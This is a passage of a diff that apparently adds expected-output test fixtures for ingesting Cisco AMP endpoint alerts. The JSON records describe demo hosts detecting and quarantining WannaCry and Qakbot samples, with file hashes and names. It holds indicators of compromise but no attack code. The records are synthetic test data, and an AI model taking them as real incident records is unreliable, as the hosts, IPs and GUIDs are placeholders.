"malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264747552596296000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17570, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.A280012EEE.in10.tht.Talos", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 756000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a659ff79ef7ffacbd61d4c2641379e44", + "file.hash.sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "file.name": "X4.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18818, + "process.hash.md5": "045451fa238a75305cc26ac982472367", + "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "process.name": "wscript.exe", + "process.pid": 4744, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 772000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "input.type": "log", + "log.offset": 20427, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 208000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21536, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 193000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 22729, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 853000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 24252, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 884000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25859, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 562000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583853374897127000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 26979, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 496121997, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043963, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27909, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 498576872, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043964, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29220, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 440000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671599780921000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 30538, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.FCE5B6784D-100.SBX.TG", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 899000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671595485954000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "5df0c4ebca109779dc8afc745d612637", + "file.hash.sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c", + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "file.name": "pp32.exe", + "file.path": "\\\\?\\C:\\pp32.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 31671, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "5df0c4ebca109779dc8afc745d612637", + "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 453000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 32991, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 437000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 35457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179213462437901", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 361000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36650, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37836, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 797000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 39029, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + 